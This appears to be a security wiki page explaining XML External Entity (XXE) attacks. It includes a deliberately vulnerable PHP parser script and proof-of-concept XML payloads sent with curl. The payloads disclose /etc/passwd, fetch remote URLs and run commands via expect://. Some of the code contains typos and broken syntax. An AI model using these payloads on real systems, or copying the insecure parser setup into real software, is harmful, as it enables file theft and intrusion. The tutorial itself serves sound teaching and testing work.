XXE
What is it?
XML External Entities (XXE) is used to attack systems that parse XML input via file upload or other ways. The modified XML file would abuse SYSTEM entity and can be used to attack a Web application. Attacks include denial of service, local file disclosure, remote code execution, and more.
Extensive Markup Language (XML) is a language designed for desktop publishing, and now widely ued for data exchange. It is a markup language similar to HTML and derived from SGML which was based on IBM's GML back from 1960s. XML is typically used instead of HTML when data must be sent from one application to another (Data Interchange)
Exploitation
XXE flaws allow injection attacks. XML by default supports "external entities". Abuse of XXE flaw allows malicious profile to turn XML parser into a proxy, potentially serving local and remote content. (External entities vuln are similar to LFI/RFI). This can lead to RCE.

Types of XXE attacks
XXE Attack Type
Description
Exploiting XXE to Retrieve Files
Where an external entity is defined containing the contents of a file, and returned in the application's response.
Exploiting XXE to Perform SSRF Attacks
Where an external entity is defined based on a URL to a back-end system.
Exploiting Blind XXE Exfiltrate Data Out-of-Band
Where sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting blind XXE to Retrieve Data Via Error Messages
Where the attacker can trigger a parsing error message containing sensitive data.
SSRF via XXE
SSRF is related to CSRF. CSRF: Forged request originating from a client. SSRF: Forged request originating from a server
Example PoC
Having access to server side scripts. Below is the vulnerable server side php script that is working on /book.php site, which if you look at HTML source you will not find the code.
<?php
$xmlfile = file_get contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$xml = simplexml_import_dom($dom);
$author = $xml->author;
$title = $xml->title;
$date = $xml->publish_date;
echo "Thank you for you file submission!<br>";
echo "Your entry: <br>";
echo "Author: " . $author . <br>";
echo "Title: " . $title . <br>";
echo "Date: " . $date . <br>";
?>
Because above php page, has XML entry for author, title, and publish_date.
PoC 1- Testing payload (xxe.xml)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "TEST" >]>
<entry>
<author>&xxe;</author>
<title>Title</title>
<publish_date>1990</publish_date>
</entry>
# Upload file via file upload on siteor Curl to send payload
curl -d@/home/test/xxe.xml http://test.com/book.php
# On browser route to http:
PoC 2 (LFI) - Display Local File (xxe2.xml)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://etc/passwd" >]>
<entry>
<author>&xxe;</author>
<title>Title</title>
<publish_date>1990</publish_date>
</entry>
#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe2.xml http://test.com/book.php
PoC 3 (RFI) - Access URL (xxe3.xml)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://google.com/robots.txt" >]>
<entry>
<author>&xxe;</author>
<title>Title</title>
<publish_date>1990</publish_date>
</entry>
#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe3.xml http://test.com/book.php
PoC 4 (RCE) - Remote Code Execution via php (xxe4.xml)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<author>&xxe;</author>
<title>Title</title>
<publish_date>1990</publish_date>
</entry>
#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe4.xml http://test.com/book.php
Sample payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Payloads
Good Resource for payloads: https://github.com/payloadbox/xxe-injection-payload-list
Cheat sheet
OWASP XML Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
Other Resources
OWASP's XML External Entity (XXE) Processing: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
Blind XXE: https://portswigger.net/web-security/xxe/blind
Exploiting XXE with local DTD files: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
From blind XXE to root-level file read acces: https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/
References
Last updated
Was this helpful?